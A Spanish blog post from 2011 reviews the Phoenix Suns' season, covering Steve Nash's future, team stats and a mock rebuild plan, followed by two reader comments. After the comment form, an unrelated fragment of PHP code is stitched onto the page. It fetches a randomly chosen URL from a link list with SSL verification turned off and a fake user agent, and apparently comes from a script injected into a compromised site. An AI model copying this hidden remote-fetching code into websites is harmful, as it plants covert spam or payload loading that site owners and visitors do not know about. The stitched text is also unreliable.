Phoenix Suns: Aprobado

10 de July de 2011 por TheDeerHunter

Se nos hace raro. El año que Nowitzki, Marion, Kidd… logran su primer anillo no podemos evitar sentir un cierto vacío en nuestro corazón porque Steve Nash aún no lo tiene, con los vínculos que le unen a algunos de esos jugadores y a la franquicia campeona. Peor aún nos sentimos por ni siquiera haberle visto en las eliminatorias después de la increíble (otra más) campaña que nos brindó el curso pasado con esa final de conferencia en la que vendieron tan cara la piel.

Nos negamos a creer con todo lo que nos han dado estos Suns “yé-yé” de Nash que esta fiesta se termina. Al fin y al cabo aún tenemos muy reciente en la retina lo que sucedió el año pasado en el primero de Gentry en el cargo, como también la lección que nos ha regalado Dallas, “los acabados” según buena parte del núcleo análitico internacional.

Pero no siempre el corazón acierta y los desengaños van a la orden del día. Hasta a Nash le cuesta más hacer tan dominante a Robin Lopez como a Amaré y si hablamos de acabados ya nos gustaría no tener que incluir a Vince, Hill, Childress, Pietrus, Warrick… Al menos no se tienen que comer el contratazo de Turkoglu, que ya es algo.

Lo cierto es que cada día más este equipo se parece más a un agujero negro que a nada que pueda ofrecer milagros y es comprensible que cada día nos mostremos más escépticos. Al menos se puede decir que todavía han dado la cara y que con poco menos del 50% de victorias se han quedado fuera, mientras que otros se clasificaron con un 45% pelado. Han sido 4º en puntos anotados y 3º en asistencias repartidas. Nash todavía toca a veces la guitarra como si fuera Jimmy Hendrix y eso no se lo puede negar nadie.

Lo mejor: Sigue mereciendo la pena pagar una entrada sólo por ver alguna de las (casi) 12 asistencias que todavía reparte Steve Nash cada noche. Gortat parece una excelente adquisición.

Lo peor: La vergüenza de 106 puntos encajados por partido. El cada día más decepcionante rendimiento de Vince Carter unido al de una lista negra en Phoenix: Childress, Pietrus, Warrick, Brooks, Lopez…

Jugando a GM

– La reconstrucción es inevitable. Fijo a Dudley (5 años), Frye (4) y Gortat (3) como base de la misma. No puede decirse que sean intransferibles pero son jugadores útiles, no demasiado costosos y con contratos largos en vigor. Es difícil que convenga incluirlos en ningún movimiento, con todo lo que tienen para desprenderse.

– Con todo el dolor de mi corazón no renovaría a Hill, como tampoco lo haría con Brooks (me plantearía la qualify offer) a no ser que fuera con unos contratos manifiestamente atractivos para la franquicia ya sea por coste y/o por duración.

– Asumiría el último año de contrato de Vince, para bien o para mal. Si a mitad de temporada alguien quiere tirar la casa por la ventana con su suculento expiring siempre estaríamos a tiempo. Podemos también asumir el de Robin Lopez, siempre que sea como reserva claro de Gortat.

– Trataría (como se supone que se está haciendo) de utilizar el excelente atractivo que todavía supone Nash para sacar piezas nocivas como Pietrus, Warrick o Childress. Eso sí, en ningún caso malvendiéndole ni tirándolo a morir a otra franquicia de medio pelo. Orlando podría llegar ser un interesante destino para él (según se muevan ellos). Sería una pena salir así, pero tampoco me parecería justo tirar un año de Nash en una franquicia en medio de ningún lado.

– Agentes libres que parecen interesantes como refuerzos (aunque no a cualquier precio): Barea, Fesenko, CJ Miles, Glen Davis…

Comenta

2 comentarios a esta entrada

  1. -=TheKing=- dice:
    #1

    Soy de los Suns a muerte, pero se debería tener en consideración lo ofrecido por Nash y dejar que escape de la forma que sea a un equipo con aspiraciones.

    No sacar nada por Amar’e es un error que pesa demasido…. años de reconstrucción, con un GM que me ofrece dudas, el año que viene me conformo con ver que dejan salir a Nash a un equipo campeón.
    No pido nada más, los años del Run&Gun han terminado, y si no tenemos un anillo en parte es por los Spurs y Duncan.

      Citar

  2. Esteban dice:
    #2

    veo a los suns como uno de los equipos mas complicados de la nba

    una mega estrella ahogandose en el mar
    contratos largos de jugadores que fracasaron y van para peor
    no tienen mucho espacio en el tope

    en si todo mal

    vince carter no merece ganar ese salario ni en sus mejores sueños, pero habria que renovarlo y tratar de conseguir un traspaso,m aun es un jugador util, y se contrato a punto de terminar puede ser atractivo, y asi estar por ensima del tope

    conseguir algunos jugadores jovenes por nash, jamer nelson seria interesante y encarar una larga recontruccion

    me doleria ver los ultimos partidos de nash y que sean en la temporada regular y no en PO

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>